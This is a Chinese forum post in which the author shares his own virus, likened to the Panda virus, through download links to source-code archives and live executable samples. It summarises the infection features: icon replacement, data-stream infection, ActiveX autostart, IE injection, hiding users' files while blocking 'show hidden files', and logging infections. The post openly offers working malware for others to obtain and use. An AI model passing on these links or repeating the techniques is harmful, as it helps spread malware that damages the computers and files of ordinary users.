小浩病毒源代码
使用迅雷下载自己写的一份病毒源代码(类似熊猫 VC)
[url=http://xiaohao.yona.biz/XiaoHao.rar]Http://xiaohao.yona.biz/XiaoHao.rar[/url] ------- 此乃源代码
这种修改ico方式是 loadexe然后enumresource icon
[url=http://xiaohao.yona.biz/XiaoHaoCodeNew.rar]Http://xiaohao.yona.biz/XiaoHaoCodeNew.rar[/url]
这是直接交换数据流的方式感染 这份rar 增加了 avtivex自启动 与 ie注入
xiaohao.yona.biz/xiahao.exe 这是样本
如果你对auto免疫 就下
xiaohao.yona.biz/Test1.exe
除了exe & 网页文件 一律隐藏... 并且导致用户 不能 "显示隐藏文件"
中后感染的记录都在c:\jilu.txt
大牛就表看;了...
Q Num: 82602935
Blog [url=http://hi.baidu.com/xh_hook]Http://Hi.baidu.com/xh_hook[/url]
Code:By 小浩 转载时请注明 不然木JJ
页:
[1]
